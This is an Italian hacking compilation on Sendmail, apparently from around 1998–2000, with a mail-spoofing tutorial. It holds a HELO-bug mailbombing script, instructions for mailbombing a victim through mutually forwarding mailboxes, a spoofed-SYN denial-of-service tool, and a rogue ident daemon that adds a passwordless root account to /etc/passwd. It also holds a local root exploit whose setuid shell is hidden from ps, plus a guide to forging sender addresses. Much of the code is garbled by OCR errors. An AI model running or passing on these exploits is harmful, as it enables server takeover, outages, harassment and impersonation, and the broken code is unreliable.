Sendmail 8.8.8 HELO bug 


Questo e' un semplice sistema utilizzato per masherare o nascondere l'header 
dei messaggi. io stesso ho constatato coma alcuni server smtp riportino 
nell'header l'ip di colui che ha scritto il messaggio, cosi', in caso di 
eventuale mailbombing, possa essere rintracciato. 


nella libreria conf.h và definito: 
#define PICKY_HELO_CHECK 1 


Questo può forzare sendmail che per mezzo del syslog causerebbe un 
X-Authentication. Warning che apparirebbe nell'header. 

questo solo se il loglevel in sendmail.cf è maggiore di 3 (anche se di 
default è 9 :) 


>From spam@flooders.net Mon Jan 5 22:08:21 1998 

Received: from spammer (sfigato@math.university.edu [150.129.84.5]) 
by myhost.com (8.8.8/8.8.8) with SMTP id WA A00376 
for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100 

Date: Mon, 5 Jan 1998 22:07:54 +0100 

From: spam@flooders.net 

Message-Id: <3.14159665@pi> 


MAILBOOM!!! 

Cosi' rimane l'header di un messaggio dove e' non stato sfruttato l'exploit, 
normalmente apparirebbero 2 "received" (anche l'host e l'ip dello spammer), 
ma si vede che e' stato eseguito in locale e appare cmq il suo ip. 


>From spam@flooders.net Mon Jan 5 22:09:05 1998 
Received: from xxxxxxxxxxxxxx... [infinite 'x'] ...XXxx 
Date: Mon, 5 Jan 1998 22:08:52 +0100 

From: spam@flooders.net 

Message-Id: <3.14159665@pi> 


MAILBOOM!!!:))))))))))))- 
Questo e' invece un esempio dell'utilizzo dell' HELO bug, si intende che 
spam@flooders.net viene cambiato nel field "mail from" con uno falso... ;) 


-- EXPLOIT CODE -- 
#!/bin/bash 
TMPDIR=/tmp/ whoami° 
PLIK=$TMPDIR/.safe 
TIMEOUT=2 


LIMIT=10 
MAX=20 


echo 

echo "SafeBomb 1.02b -- sendmail HELO hole usage example" 
echo "Author: Michal Zalewski <lcamtuf@boss.staszic.waw.pl>" 
echo 


if [ "$4" = "" ]; then 
echo "USAGE: $0 msgfile address server sender" 
echo 
echo " msgfile - file to send as a message body" 
echo " address - address of lucky recipient" 
echo " server - outgoing smtp server w/sendmail" 
echo " sender - introduce yourself" 
echo 
echo "WARNING: For educational use ONLY. Mailbombing is illegal." 
echo "Think twice BEFORE you use this program in any way. Also," 
echo "I've never said this program is 100% safe nor bug-free." 
echo 
sleep 1 
exit 0 
fi 


if[!-f$1]; then 
echo "Message file not found." 
echo 
exit 0 

fi 


echo -n "Preparing message..." 

mkdir $TMPDIR &>/dev/null 

chmod 700 $TMPDIR 

echo "echo \"helo 
_safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb 
omb__safebomb__safebomb__safebomb__sa 
febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb 
__safebomb__safebomb__safebomb__safebomb__safebomb___saf 
ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_ 
_safebomb__safebomb__safebomb__safebomb__safebomb__ safe 
bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__ 
safebomb__safebomb__safebomb__safebomb__safebomb__safeb 
omb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__s 
afebomb__safebomb__safebomb__safebomb__safebomb__safebo 
mb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa 
febomb__safebomb__safebomb__safebomb__safebomb__safebom 
b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf 
ebomb__safebomb__safebomb__safebomb__safebomb__safebomb 


b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf 
ebomb__safebomb__safebomb__safebomb__safebomb__safebomb 

_ safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe 
bomb__safebomb__safebomb__safebomb__safebomb__safebomb_ 
_safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_\"" 
>$PLIK 

echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK 

echo "echo \"rcpt to: $2\"" >>$PLIK 

echo "echo \"data\"" >>$PLIK 

echo "cat <<__qniec__" >>$PLIK 

cat $1 >>$PLIK 

echo "__qniec__" >>$PLIK 

echo "echo \".\"" >>$PLIK 

echo "echo \"quit\"" >>$PLIK 

echo "sleep $TIMEOUT" >>$PLIK 

chmod +x $PLIK 

echo "OK" 


echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort." 
SENT=0 


while [ -f $1 ]; do 
$PLIK]telnet $3 25 &>/dev/null & 
let SENT=SENT+1 
echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b" 
CONNECTED= psjgrep -c "telnet $3" 
if [ "$8LIMIT" -le "$CONNECTED" ]; then 
while [ "$LIMIT" -le "$8CONNECTED" ]; do 
sleep 1 
done 
fi 
if [ "$SENT" -ge "$MA X" ]; then 
echo "It's just an example, sorry." 
echo 
exit 0 
fi 
done 
-- EOF -- 


TRACK ! :) mail box distrutta. 

un sistema interessante per fare mailbomb e': 

registrate 2 mail box anonime su www.iname.com o www.poboxes.com o qualsiasi 
altro server che concenda free-mailbox con forward. 

supponiamo che le mail box siano abc@iname.com e 123@iname.com impostatele 
in modo che facciano il forward reciproco tra loro, e in CC ci mettere la 

vittima del vostro bombardamento... dopodiche', telnettatevi a una shell, 

caricate il beneamato elm, mandate una mail attraverso un remailer MixMaster 

a uno degli indirizzi di iname, la velocita' con cui i messaggi si 


copieranno sara' PAUROSA, in meno di un'ora la vittima si trovera' 
disintegrata! ;-) 


P.S. AMICI CARI mi raccomando non fatelo a me ;) 


non so chi di voi conosce antirez, o ne ha sentito parlare, o l'ha visto 
parlare in IRC... questo exploit e' suo : (Salvatore Sanfilippo 
<antirez@seclab.com>) 


Questo exploit mostra una vulnerabilità di Sendmail e di Qmail e di come 
possono essere exploitate attraverso dei pacchetti TCP spoofati. 


Michal Zalewski aveva precedentemente presentato: 

1.Attaccante manda SYN alla porta X dell'host vittima, dst_port=25, 

spoof_addr SPOOFHOST (la vittima invia SYN/ACK a SPOOFHOST) 

2. SPOOFHOST mandaRST dalla porta X alla vittima, dst_port=25 rispettando la 
sequenza di numeri (e la vittima risponde ancora con SYN/ACK)... la vittma 

ha un errore in accept() e entro 5 secondi andrà in "refusingconn" mode 

3. aspettare 2 secondi 

4 andare all'1. 


la sorgente dell'exploit è per linux, ma non lavora contro i linux. 


Viti 
* smad.c - sendmail accept dos - 
* 


* compile it under Linux with gcc -Wall -o smad smad.c 
* 

* usage: smad fakeaddr victim [port] 

gi 


#include <unistd.h> 
#include <string.h> 
#include <stdio.h> 
#include <stdlib.h> 
#include <arpa/inet.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <netinet/tcp.h> 
#include <netinet/ip.h> 
#include <netinet/in.h> 
#include <netdb.h> 
#include <unistd.h> 


#define SLEEP_UTIME 100000 /* modify it if necessary */ 


#define PACKETSIZE (sizeof(struct iphdr) + sizeof(struct tcphdr)) 


#define OFFSETTCP (sizeof(struct iphdr)) 
#define OFFSETIP (0) 


u_short cksum(u_short *buf, int nwords) 
{ 

unsigned long sum; 

u_short *w = buf; 


for (sum = 0; nwords > 0; nwords-=2) 
sum += *wW++; 


sum = (sum >> 16) + (sum & Oxffff); 
sum += (sum >> 16); 
return “Sum; 


} 


void resolver (struct sockaddr * addr, char *hostname, u_short port) 
{ 

struct sockaddr_in *address; 

struct hostent *host; 


address = (struct sockaddr_in *)addr; 


(void) bzero((char *)address, sizeof(struct sockaddr_in)); 
address->sin_family = AF_INET; 

address->sin_port = htons(port); 
address->sin_addr.s_addr = inet_addr(hostname); 


if ( (int)address->sin_addr.s_addr == -1) { 
host = gethostbyname(hostname); 
if (host) { 
bcopy( host->h_addr, 
(char *)&address->sin_addr,host->h_length); 


} else { 
perror("Could not resolve address"); 
exit(-1); 

} 


} 

int main(int argc, char **argv) 
char runchar[] = "|/-\\"; 
char packet[PACKETSIZE], 
*fromhost, 


*tohost; 


u_short fromport = 3000, 


toport = 25; 


struct sockaddr_in local, remote; 
struct iphdr *ip = (struct iphdr*) (packet + OFFSETIP); 
struct tcphdr *tcp = (struct tcphdr*) (packet + OFFSETTCP); 


struct tcp_pseudohdr 
{ 
struct in_addr saddr; 
struct in_addr daddr; 
u_char zero; 
u_char protocol; 
u_short lenght; 
struct tcphdr tcpheader; 
} pseudoheader; 


int sock, result, runcharid = 0; 
if (argec < 3) 
{ 


printf("usage: %s fakeaddr victim [port]\n", argv[0]); 
exit(0); 

} 

if (argc == 4) 
toport = atoi(argv[3]); 


bzero((void*)packet, PACKETSIZE); 
fromhost = argv[1]; 
tohost = argv[2]; 


resolver((struct sockaddr*)&local, fromhost, fromport); 
resolver((struct sockaddr*)&remote, tohost, toport); 


sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); 
if (sock == -1) { 

perror("can't get raw socket"); 

exit(1); 
} 


/* src addr */ 

bcopy((char*)&local.sin_addr, &ip->saddr,sizeof(ip->saddr)); 
/* dst addr */ 
bcopy((char*)&remote.sin_addr,&ip->daddr,sizeof(ip->daddr)); 


ip->version = 4; 

ip->ihl = sizeof(struct iphdr)/4; 
ip->tos = 0; 

ip->tot_len = htons(PACKETSIZE); 


ip->id = htons(getpid() & 255); 
/* no flags */ 

ip->frag_off = 0; 

ip->ttl = 64; 

ip->protocol = 6; 

ip->check = 0; 


tcp->th_dport = htons(toport); 
tcp->th_sport = htons(fromport); 
tcp->th_seg = htonl(32089744); 
tcp->th_ack = htonl(0); 

tcp->th_off = sizeof(struct tcphdr)/4; 
/* 6 bit reserved */ 

tcp->th_flags = TH_SYN; 
tcp->th_win = htons(512); 


/* start of pseudo header stuff */ 

bzero(&pseudoheader, 12+sizeof(struct tcphdr)); 

pseudoheader.saddr.s_addr=local.sin_addr.s_addr; 

pseudoheader.daddr.s_addr=remote.sin_addr.s_addr; 

pseudoheader.protocol = 6; 

pseudoheader.lenght = htons(sizeof(struct tcphdr)); 

bcopy((char*) tcp, (char*) &pseudoheader.tcpheader, 
sizeof(struct tcphdr)); 

/* end */ 


tcp->th_sum = cksum((u_short *) &pseudoheader, 
12+sizeof(struct tcphdr)); 
/* 16 bit urg */ 


while (0) 
{ 
result = sendto(sock, packet, PACKETSIZE, 0, 
(struct sockaddr *)&remote, sizeof(remote)); 
if (result != PACKETSIZE) 
{ 
perror( "sending packet"); 
exit(0); 
} 
printf("\b"); 
printf("%c", runchar[runcharid]); 
fflush(stdout); 
runcharid++; 
if (runcharid == 4) 
runcharid = 0; 
usleep(SLEEP_UTIME); 


return 0; 


SenDmAiL 8.6.10 buffer overflow 


gcc ident.c -o ident 

agginugere in /etc/inetd.conf: 

ident stream tcp nowait root /tmp/ident in.identd 

poi kill -HUP inetd e riavvia inetd con la nuova riga caricata. 


#include <sys/types.h> 
#include <sys/fcntl.h> 
#include <sys/time.h> 
#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <unistd.h> 


/* TIMEOUT is the number of seconds to wait before closing the connection if 
* the client doesn't provide the port pairs. 
*/ 


#define TIMEOUT 120 
/* PROCINFO_BUFFER_ SIZE must be bigger than 80 */ 


#define OUTPUT_BUFFER_SIZE 2048 
#define SOCKET_BUFFER_SIZE 100 


unsigned short lport = 0, rport = 0; 


void 
main () 
{ 
unsigned long here, there; 
struct fd_set fdset; 
struct timeval timeout; 
char buffer[OUTPUT_BUFFER_ SIZE]; 
char inbuffer[SOCKET_BUFFER_SIZE]; 
int len; 
int fd; 


FD_ZERO (&fdset); 
FD_SET (0, &fdset); 
timeout.tv_sec = TIMEOUT; 
timeout.tv_usec = 0; 


select (1, &fdset, NULL, NULL, &timeout); 

len = read (0, inbuffer, SOCKET_BUFFER_ SIZE - 1); 
if (len <= 0) 

exit (0); 

FD_SET (0, &fdset); 


sprintf (buffer, "%s : USERID : UNIX : %s\r\n", inbuffer, 

"Croot\r\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\r\nMlocal, 

P=/bin/sh, F=1lsDFMeu, A=sh -c $u\r\nR<\"|/bin/echo 
toor::0:1:toor:/:/bin/csh >> /etc/passwd\">\r\nR<\"|/usr/bin/chmod 4755 
lusr/bin/time\"); 

write (1, buffer, strlen (buffer); 

exit (0); 


Exploit sendamil 8.7.x e 8.8.4 
/bin/sh 


si crea in /tmp/x una shell suicidata root 


Modifica RUN in x.c in modo che non sia visibile con ps, o perlomeno non si 
veda x attivo, ma altro tipo "pine" "vi" "gcc"... 


cat << _EOF_ >/tmp/x.c 
#define RUN "/bin/ksh" 
#include<stdio.h> 
main() 
{ 
execl(RUN,RUN NULL); 
} 
_EOF_ 
# 
cat << _EOF_ >/tmp/spawnfish.c 
main() 
{ 
execl("/usr/lib/sendmail","/tmp/smtpd",0); 
} 
_EOF_ 
# 
cat << _EOF_ >/tmp/smtpd.c 
main() 
{ 
setuid(0); setgid(0); 
system("chown root /tmp/x ;chmod 4755 /tmp/x"); 
} 
_EOF_ 
# 


# 
gcc -O -o /tmp/x /tmp/x.c 
gcc -03 -o /tmp/spawnfish /tmp/spawnfish.c 
gcc -03 -o /tmp/smtpd /tmp/smtpd.c 
# 
/tmp/spawnfish 
kill -HUP ‘/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// 
[cut -d"" -f1° 
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c 
sleep 5 
if [ -u /tmp/x ]; then 
echo "leet..." 


Fine spero vi sara' utile ci vediamo ciao a tutti. 


Contenuti 


-Sendmail? Huh? 

* Cos'è Sendmail? 

* Per cosa è usato? 

* Perchè i dovrei voler conoscere Sendmail? 

-Come creo email fasulle che sembrano vere? 

* Intendi che posso mandare e-mail da bgates@microsoft.com or bclinton@whitehouse.org?! 
* E' possibile creare una e-mail al 100% autentica? 

* Come posso imparare i comandi del rude Sendmail da solo? 

* Ma se sono lento? Me li puoi insegnare per favore? 

* Come posso seguire le tracce delle false email malfatte? 

* Come posso seguire le tracce delle false email più sofisticate? 

* Posso essere beccato? 

* Sarò beccato? 

-Hackerare un server? Attraverso Sendmail?! 

* Posso realmente hackerare un host che esegue Sendmail? 

* Perchè Sendmail è chiamato "Il daemon più ricco di bug della terra" comunque? 
* Ok, fantastico, adesso come posso farlo? 

* Puoi dirmi di più circa i vari buchi nella sicurezza di Sendmail? 

* Dove posso trovare più buchi sulla sicurezza di Sendmail? 

* Come posso sapere quale versione di Sendmail ha l'host obbiettivo? 

* Perchè dovrei curarmene comunque? 

* Come posso usare gli archivi BugTraq per trovare i buchi che sto cercando? 
* Posso essere acchiappato? 

* Sarò acchiappato? 

* note finali 

-Okay, io posso hackerare un host che esegue Sendmail. Come lo posso fare? 
* Un DoS(29) locale in tutte le versioni di Sendmail successive la 8.9.3 

* Bug nel comando HELO di Sendmail 

* Bug gigante in Sendmail 8.8.4 


* Note finali 

-Angolo dei Newbies 

* Cos'è un daemon? 

* Cos'è una porta? 

* Cos'è un service? 

* Cos'è un daemon banner? 

* Cos'è un timeout (in termini di computer)? 
* Cos'è TCP e come lavora? 

* Cos'è UDP e come lavora? 

* Cos'è ICMP e come lavora? 

* Cos'è un indirizzo IP? 

* Cos'è un hostname? 

* Come scoprire quali sono i server di posta del tuo ISP? 


* Cos'è un portscanner? 

* Cos'è un services scanner? 

* Cosa/Chi è un root? 

* Cos'è un ampiezza di banda? 

* Cos'è un programma client? 

* Cos'è un server DNS? 

* Cos'è telnet (il telnet daemon e il programma telnet)? 
* Cos'è un interprete dei comandi? 

* Cos'è uno shell account? 

* Cos'è un sysadmin? 

* Cos'è l'iper testo? 

* Cos'è un RFC? 

* Cos'è interNIC? 

* Cos'è un sotto dominio (e quanto costa un dominio veramente)? 
* Cos'è SSH? 

* Cos'è una mailing list moderata/bacheca messaggi? 
* Cos'è un attacco DoS? 

* Cos'è DUN? 

* Cos'è un account dial-up? 

* Cos'è un password file di Unix? 

* Cos'è un thread? 

-Appendice A: falsi daemons 

* Falso daemon di Sendmail 

* Falso daemon di telnet 

-Appendice B: lettere deviate 

* Come poso deviare la mia posta? 

* Come questo mi può aiutare? 

-Appendice C: falsificare l'IP del mittente 

* Come posso falsificare il mio IP nell'header dell'e-mail? 
* Dove posso leggere di più su questo genere di cosa? 
-Appendice D: replay-to 

* Cosa fa l'opzione replay-to? 

* Come uso ciò? 

-Appendice E: CC e BCC 

* Cosa fanno questi comandi? 

* Come li uso? 


Sendmail? Huh? 


Sendmail è un daemon(1) che aspetta connessioni sulla porta(2) 25. E' usato per inviare la 
posta in uscita. 

Per esempio: il tuo email provider (probabilmente il tuo ISP (Internet Service Provider) 
probabilmente usa due servers (a meno che non è un account di posta basato sul web come 
Hotmail.com): 

1) mail.boring-ISP.net (probabilmente porta 110): per la posta in entrata 

2) smtp.boring-ISP.net (probabilmente porta 25): per la posta in uscita 


Il più delle volte i servers di posta sono abbastanza simili a questo, ma gli indirizzi variano 

a seconda dei differenti ISP. 

Mail.boring-ISP.net potrebbe richiedere un username e una password così che le persone non sono 
capaci di leggere la tua posta, così saltiamo questo (potrei discutere il cracking di queste 
password in un altro tutorial, ma ricorda, io ti sto insegnando queste cose così che tu 
conoscerai come lavorano i malicious crackers e come non cadere nei loro trucchi, non per 
farti infrangere la legge e danneggiare gli altri, poi vedi tu questo è un paese libero... =) 
Adesso tanto sorprendente quanto potrebbe suonare, smtp.boring-ISP.net non richiederà una 
password o ogni altro tipo di identificazione. 

Se tu ti colleghi tramite telnet(19) in smtp.boring_ISP.net sulla porta 25 e digiti i comandi 
esatti, sarai capace di mandare e-mail false. Interessante... Huh? 

Adesso la parte più fantastica è che puoi hackerare un server o almeno farlo cadere lanciando 
Sendmail, poichè Sendmail contiene un mucchio di merda di bugs a buchi nella sicurezza. 


Come posso creare e-mail fasulle che sembrano vere? 


Come menzionato nel capitolo precedente, mandare e-mail non richiede che tu abbia un account 
sulla macchina dalla quale stai mandando l'e-mail (il server per la posta, non il tuo computer). 

Tutto quello di cui hai bisogno è conoscere l'indirizzo IP(9) / hostname(10) del server della posta 

e i comandi di Sendmail. 

Presumiamo che tu conosci l'IP/hostname del tuo obbiettivo. Se tu non conosci questi importanti 
dettagli, per favore vai a Come scoprire(11). 

Adesso procediamo con questo. Questa volta, diversamente dai precedenti tutorials, "imparerò" tutto 
da capo e ti descriverò e guiderò attraverso l'intero processo di apprendimento e ad usare quello 

che hai imparato. 


Okay, cominciamo. 

Il nostro obbiettivo per oggi è smtp.someone.it sulla porta 25. 

Primo, collegati tramite telnet in quella porta digitando "telnet smtp.someone.it 25" (senza le 
virgolette) su uno standard Unix, o c:\windows\telnet.exe o dal tuo telent preferito digitando 
smtp.someone.it nel campo host e 25 nel campo della porta, o eseguendo il telnet preferito da 
XWilndows (un interfaccia grafica per Unix. Se tu sei bravo abbastanza da eseguire una qualche 
versione 

di Unix non ti dovrebbe risultare difficile trovarne una. Se tu non gradisci il telent di default puoi 
sempre andare su www.linuxberg.com e prenderne uno) e digitando i dettagli corretti (host e porta). 
Nota su VT: ti potrebbe essere richiesto il tipo di terminale durante il processo di connessione. 
Qualcosa con VT e alcuni numeri dopo himmm..... 

VT sta per Virtual Terminal. Poichè ci sono alcuni tipi di terminale (tutti i generi di monitor, 
vecchi terminali di stampa, ecc..) ti verrà chiesto di sceglierne un tipo. VT100 dovrebbe andare bene 
per molti. 

Nota circa lo shell account(21): se tu non stai eseguendo Unix e vorresti usare strumenti 

di Unix su un sistema Unix mentre lavori, connettiti tramite telnet a nether.net sulla porta 23, 
accedi come newuser e ottieni uno shell account gratuito. Se tu sei un utente maggiormente dei 
programmi 


per windows (io uso la roba di windows quando lavoro da windows, eccetto in certe condizioni in cui 
io 

veramente ho bisogno di Unix e non ho voglia di resettare e riavviare. In questo caso, mi procuro uno 
shell 

account così che posso usare le cose di Unix da window) vai avanti (le cose lavoreranno più 
velocemente poichè 

i programmi sono attualmente collocati sulla tua macchina, non su qualche computer distante che 
esegue 

uno shell account), ma io ti raccomando di prendere uno shell account su nether.net (in fatti loro ti 
insegneranno un sacco di cose fantastiche su Unix quando ti registrerai). 

Nota sulla connessione telnet da machintosh: machintosh non ha un programma telnet in dotazione. 
Comunque, ne puoi scaricare uno da www.ncsa.edu/SDG/Software/MacTelnet/ (grazie a little_v per 
questo!). 


Adesso, vediamo cosa otteniamo dopo che ci siamo connessi con telnet a smtp.someone.it:25 (in questo 
caso, il carattere : sta per 'sulla porta"). 


220 alpha.someone.it ESMTP Sendmail 8.9.3/8.8.6; thu, 8 Jul 2000 21:46:01 +0000 (GMT). 


AHA! Questo è... questo è... COSA DIAVOLO E' QUESTA COSA? Questo, amico mio, è un daemon 
banner(4), 

e ci ha appena dato tonnellate di preziosi pezzi di informazione! 

Normalmente, queste informazioni sono destinate a un programma client(16) per determinare quale 
versione 

di Sendmail il bersaglio sta eseguendo e come comunicare con esso (il programma dovrebbe sapere 
che, per 

esempio, ogni versione di Sendmail inferiore alla 7.0.0 usa il comando 'halb' invece del comando 
'blah', 

ecc..). Questo daemon banner è anche una grande cosa per gli hackers e i crackers, poichè possiamo 
determinare quale versione del nostro obbiettivo è eseguita. Dopo quando discuteremo su come 
hackerare 

il server, queste informazioni saranno estremamente preziose. 

Okay, analizziamo cosa abbiamo... 

220... non sappiamo che significa per ora... 

alpha.someone.it niente fortuna, non può fare niente così... 

ESMTP...hmm... SMTP sta per Simple Mail Transfer Protocol. E' il protocollo(18) usato dai clients di 
posta 

per comunicare con i daemons Sendmail, e questo è quello che stiamo provando a imparare proprio ora. 
ESMTP è Extended SMTP. E' più o meno lo stesso di SMTP, solo che contiene alcuni comandi in più. 
Lasciamo stare questo per il momento. 

Sendmail 8.9.3/8.8.6 - AHA! Ecco qualcosa di interessante. Sappiamo la versione del daemon 
Sendmail! 

Ricordati questo, ci aiuterà durante il prossimo capitolo (hacking in un server che esegue Sendmail). 

Il resto è immondizia (ora,data, ecc..). 

Okay, andiamo avanti... come posso comunicare con questa cosa? 

Er... proviamo a digitare 'help' (senza le virgolette). Oh, approposito, è normale non vedere quello che 
digiti quando comunichi con Sendmail poichè non ti rimanda indietro i tasti digitati. Devi selezionare 
"local echo" sul tuo programma telnet per poter vedere cosa digiti. 


214- This is Sendmail version 8.9.3 

214- Topics: 

214- HELO EHLO MAIL RCPT DATA 

214- RSET NOOP QUIT HELP VREFY 

214- EXPN VERB ETRN DSN 

214- For more info use "HELP" 

214- To report bugs in the implementation send email to 

214- sendmail-bugs@sendmail.org. 

214- For local information send email to Postmaster at your site. 
214- End of HELP info 


Weeeee! Questo è grande!!! 

A questo punto avresti dovuto supporre che questo numero (il 220 nel daemon banner e il 214 qui 
sopra) 

è in realtà un 'tipo del messaggio'. Esso esprime il tipo del messaggio che ricevi. Ogni tipo di 
messaggio (errore a causa di questo, errore a causa di quello, aiuto per questo, messaggio di conferma 
per quello ecc..) ha il suo proprio numero. 

Okay, andiamo avanti. Proviamo a digitare 'help helo'. 


214- HELO 
214- Introduce yourself 
214- End of HELP info 


Visto? Io te l'avevo detto. 214 è il numero del tipo di messaggio usato per i messaggi di help. 

Okay, in questo modo tu puoi praticamente insegnarti cosa fa ogni comando di Sendmail. Fermati 
subito, 

leggi tutti i messaggi di help e poi continua. E' importante che tu impari come imparare le cose da solo. 
Potresti vedere alcune note riguardanti la parola RFC(24) e alcuni numeri. Puoi trovare RFC a 
www.linuxberg.com. 

Nota su ESMTP: ricordi quell'ESMTP di cui abbiamo parlato prima? Potrai ottenere un buon indizio 
su cos'è ESMTP leggendo i messaggi di help. Si, sto provando a obbligarti a leggerli... fallo! 

Essi contengono tonnellate di fantastiche informazioni tanto per i newbies che per i professionisti. 


Okay, presumo (e spero) che tu abbia finito di leggere tutti quei messaggi di help. Adesso andiamo 
avanti. Per primo abbiamo bisogno di indicare un mittente. Facciamo questo digitando 

'MAIL FROM: <bgates@microsoft.com>' 

(rimuovi le virgolette e sostituisci l'indirizzo fasullo con quello che preferisci, ma lascia < e >). 

Il mail server dovrebbe rispondere on questo messaggio: 

250 bgates@microsoft.com... Sender ok 

Poi digitiamo 'RCPT TO: <vitt@lamer.com>' (sostituendo vitt@lamer.com con l'indirizzo a cui 
vogliamo 


inviare l'e-mail) 


Dovremmo ottenere: 


250 vitt@lamer.it... Recipient ok 


Puoi aumentare i destinatari semplicemente ripetendo l'operazione più volte, logicamente con diversi 
destinatari. 


Adesso, pensiamo al corpo del messaggio. Digita 'data' per incominciare a scrivere il corpo del 
messaggio. 


354 Enter mail, end with "." on a line by itself 
Adesso digitiamo un pò di cose... 


Subject: fake mail (nota circa questa linea: con questa linea tu puoi determinare quale soggetto 
vuoi dare al tuo messaggio). 

Salve. Questa è una e-mail falsa. 

Sono annoiato, preferirai fare qualcosa di più serio... 

Datemi qualcosa da HACKERARE!!!! 


Adesso otteniamo questo 
250 CAA15133 Message accepted for delivery 


Adesso ti starai chiedendo cosa diavolo è quella sigla dopo 250. Questa è chiamata message ID (0 
MID). 

E' solo uno stupido numero, ma lo useremo in seguito... non tormentare la tua preziosa testa per questo. 
Adesso, se tu sei se tu fossi il ricevente avresti un falsa e-mail attendibile al 100%? O no? 


Diamo un'occhiata a cosa otterrà il ricevente... 

Hmmmm... sembra un messaggio comune. Almeno per un utente comune... 

Diamo un occhiata alle proprietà. 

Le proprietà sono alcune linee che arrivano con ogni indirizzo email. La maggior parte dei client di 
posta attuali mostrano solo le parti più semplici delle proprietà (mittente, soggetto, data, ecc..), 

ma adesso abbiamo bisogno delle proprietà complete. 

Su Netscape Messanger per mostrare le proprietà vai su View ==> Headers ==> All. Su eudora si fa 
clickando sul bottone che mostra la didascalia "blah blah blah" quando lasci il puntatore del mouse su 
di esso per un paio di secondi. Compuserve automaticamente mostra le proprietà complete. 

Su outlook, fai click col tasto destro del mouse sul messaggio, scegli proprietà e poi dettagli. 

Su pine, dovresti avere un opzione da qualche parte nello schermo di configurazione che ti lascia 
scegliere quale tipo di header vuoi vedere (intero o breve). 

Adesso diamo uno sguardo alle proprietà, fatto? 


Received: from alpha.netvision.net.il (alpha.netvision.net.il [194.90.1.13]) 

by cmx.netvision.net.il (8.9.3/8.9.3) 

with ESMTP id CAA15313 for victim@victim.com>; Sat, 10 Jul 1999 02:49:59 +0000 (GMT) 
From: bgates@microsoft.com 

Received: from some.hostname.crap.com (some.hostname.crap.com [62.0.146.225]) 


by alpha.someone.com (8.9.3/8.8.6) 

with SMTP id CAA15313 for victim@victim.com; Sat, 10 Jul 1999 02:55:46 +0300 (IDT) 
Date: Sat, 10 Jul 1999 02:55:46 +0300 (IDT) 

Message-ID: <199907092355. CAA15313@alpha.someone.com> 
X-Authentication-Warning: alpha.someone.com: some.hostname.crap.com [62.0.146.225] 
didn't use HELO protocol 

Subject: Fake mail 

Status: 

X-Mozilla-Status: 8001 

X-Mozilla-Status2: 00000000 

X-UIDL: 3752da3b000002ff 


Yeahhh! Guarda tutti questi numeri, lettere e cose incomprensibili! 

Incominciamo da sopra: 

Received: from alpha.netvision.net.il (alpha.netvision.net.il [194.90.1.13]) by cmx.netvision.net.il 
(8.9.3/8.9.3) with ESMTP id CAA15313 for victim@victim.com>; Sat, 10 Jul 1999 02:49:59 +0000 
(GMT) 

così l'email è stata ricevuta da alpha.netvision.net.il (alpha.netvision.net.il [194.90.1.13]). 

Che significa? Una piccola verifica sul database di InterNIC(25) (digitando ‘whois 
alpha.netvision.net.il' 

senza le virgolette su un sistema Unix o su SamSpade per windows scaricabile a www.samspade.org) 
rivela che è posseduta da someone.com. Questo è una sorta di sub-server che essi usano per mandare 
posta. 

Lasciamolo da parte non è importante per noi ora. La parte (alpha.netvision.net.il [194.90.1.13]) mostra 
l'hostname(10) e l'indirizzo IP(9) del server dal quale è stata mandata l'e-mail. 

Ohh, ohh, aspetta! La mail non dovrebbe essere stata mandata da microsoft.com? Mi spiego, il mittente 
è 

bgates@microsoft.com! Se noi avessimo mandato l'email da microsoft.com invece che da 
someone.com ciò non 

sarebbe dovuto accadere. Sarebbe sembrata una normale email...da bill gates... bene, almeno così alla 
lontana. 

Comunque, il resto è semplicemente il MID (di cui ci occuperemo in seguito) e la data del messaggio 
(la data di spedizione) in accordo con il server dal quale è stato mandato. La parte +0000 (GMT) 
significa 

che è stato mandato da una zona che ha il fuso orario di Greenwich. Se fosse stato mandato, per 
esempio, dalla 

zona di tempo +0200 ciò avrebbe significato che questo fuso orario è attualmente quello di Greenwich 
più due ore. Cerca la tua zona di fuso orario così che sarai capace di spostare la zona di tempo e quando 
è stato 

mandato il messaggio nel tuo orario. 

Adesso, ci sono cose più importanti. 


From: bgates@microsoft.com 
Bene, suppongo che questa linea sia ovvia, andiamo avanti. 


Received: from some.hostname.crap.com (some.hostname.crap.com [62.0.146.225]) by 
alpha.someone.com 


(8.9.3/8.8.6) with SMTP id CAA15313 for victim@victim.com; Sat, 10 Jul 1999 02:55:46 +0300 
(IDT) 


Okay, adesso questo è veramente interessante. Qui abbiamo l'hostname e l'IP del mittente. Nota circa 
l'hostname: un utente dial-up(31) avrà un lungo e contorto hostname. Per esempio: il mio hostname 
adesso 

(almeno quando stavo scrivendo queste cose) era RAS4-p97.hfa.netvision.net.il . Netvision.net.il è il 
mio 

ISP, e il resto è per lo più merda (presta particolare attenzione a 'hfa'. Hfa sta per Haifa, che è la mia 
città. Ciò significa che mi sto connettendo tramite il server di Netvision di Haifa. Visto? L'hostname 
può 

essere interessante). 

A questo punto ti devi essere accorto che l'hostname che vediamo non proviene certamente da 
microsoft.com, 

e che il server per la posta che ha mandato questo messaggio non è esattamente microsoft.com o un 
sub-domain(26) di microsoft, il che mostra che quest'e-mail è chiaramente falsa. 

Un'altra nota circa l'hostname: qualche volta tu potresti non avere un hostname, ma tu avrai sempre un 
